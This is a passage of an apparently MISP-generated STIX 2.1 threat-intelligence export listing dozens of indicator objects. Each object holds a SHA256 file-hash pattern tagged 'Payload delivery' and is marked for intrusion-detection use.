"id": "indicator--58db64d6-20b4-4432-b60c-4082950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '03262308f43830db8fa4c3568aee387df5de96743c287bc6b49bea309b2dc373']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d7-5c10-4c70-8024-4b12950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '95637e684a42583be98f3c1d2567cb5bdc3e7fcb875f054b58b1036f32834ada']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d8-4bec-44d8-962b-4284950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f3ac0db23744528e8169c1bc58c844b0fdfa4129c5e8700b4bffb07daa75d1e4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d9-eafc-4571-a2b9-4081950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e38804084d5cb0e7e80fd9144ed012dc92e89b68586dc2611ee90392d2fe46f7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64d9-4ea0-4100-b330-422a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6a1999cd18373653766b9385c3e60a3f21ffa040180172eb206142f601384d76']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64da-d9a8-4c6d-b324-4cb8950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '85176e6b449dc548af04c29fe13e8622c275c84691d449d6392607013f6fce07']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64db-ebfc-4c61-8c52-4aaf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd653637357b94b8547f5d81e78248c5f7dec8f64a3f7918563c1b5fa9086b3e8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64dc-9b24-4a28-afa4-432e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '97ee5dc97b2d21d299034cb02cc814a63494a31689afa3be9e47015b40b8b308']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64dd-8b3c-41ca-bd9c-403e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b1f47264a60d732ad917770406badcfaa3b845d85841c46b27ea758ee82f18c2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64de-b2bc-400e-beb7-4b11950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '201480d3fe6598cb7557c4940e5db96e71de9a15364b19865ee61c11658e2b5b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64df-ab60-4507-8480-49eb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ed9f3dba0c9a987094d1921e5316398aea169bf907ce848d6518ea40db15c46d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64df-4bc8-49ff-94a1-4a1f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c2ba05bbebb35e99780c87e23a3d6f7b05ffcb17b21ee27f05fb62ec13e25b0e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e0-f1c8-4ea3-b8a3-425b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'abc4b46a96f432605336dbe376a92feeb77d768c473d52b725a853a3abeae92c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e1-1004-4ba8-843e-467c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b2eae31ae2fecf69a5940e5e7d3ec90b241bd1223a4af25204676b67a176c88c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e2-1908-4d6e-b012-4de7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '2d2c65e64f18e38991c609ca7d16cafb928c5c96132fe8f361dc3f31473b93f7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e3-f848-48a6-9cc5-4933950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5750fcf5b4e31fcab9e81f154e1ec04105dd909f46ffdb9bcb986d7da9e6c22b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e4-7a60-4963-8440-46bc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '8ab4e92cd37cda1273f2359ec8d2c4b9cc4cf02faa199f8fe71f4f200a3ab31d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e5-e14c-4c3a-8a7c-4c06950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c693c3983f3c6e2e20d338ba240ff7411121a674b267ff86914156f9a91d5be4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e6-9ce0-44b8-8b23-4d79950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cc05d4bffba7464194bf25ef5f8dfe9541048404b29e31fa93392663b1873501']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e7-5c44-48a4-a318-4962950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '375005db3906b1aad931c0207932ccdc99a191e9ceb100ae364ee1f2ca15682d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e8-29d8-4b2d-9340-4291950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f9b85d337aeba34d23cbe1340f596cc908f572cbeeb5fed4fb389d779c7d5004']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e8-7338-4c9d-a268-4345950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '941007ae7918e8eb1845598053cf7fc4b0c17d708c2dbd1d1b13d2dc12b138e1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64e9-b980-43cc-9c26-4e44950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '6069b42bfdf59ce5ec95f068e871ee266fa7593457eb4b38dda113014be87ce6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ea-cbc0-421d-8764-459b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd3f4e3459bbe753ea8c022eef425d5b098b0f32c0e4cc4f390442d9796ed4ee2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64eb-b2d4-46ce-8b21-4bc7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '9dd9befeefdc13ae72bf90952892eb357bdff72083c282fb73dd3821afe43e72']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ec-19e0-4376-b7ba-4be2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'eb1f746dbdc2598757423e4505ff898b8308282e638f9b940d84870e7a196fba']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ed-e888-4cef-9fe1-4455950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '32b7a4f26eb3e2f44eeb82b95f9971572aeb82f1e218bbad39b2a8238d1448bd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ee-ee5c-4bbb-b620-432a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e3e708a03186f373d002e6e84c649bbd95668c2c17dee9c7fb0143f3d675837c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ef-bda0-4406-8454-468e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b909e6e7f909abbb57af26b244b330f822ed552a3c4dadd028079d8070108c10']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64ef-c7d8-4ccd-9d00-4fba950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '813fdde0b998bda3247eadab873677972681274b4a9905030bf8d76727d57a6c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f0-6df4-49e3-892f-49cf950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0353e9168983735e8efd2d53b4c498b7810f49e67169e33eb42ed2ef8d3a13eb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f1-8a5c-49ed-bfa5-4632950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '49b2fae0ae4d9cf71c2766a0d965d8a50bacd8c522eb45656b8b5f6a1c7c8f51']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db64f2-7c58-4d37-93e7-4f21950d210f",
|
|
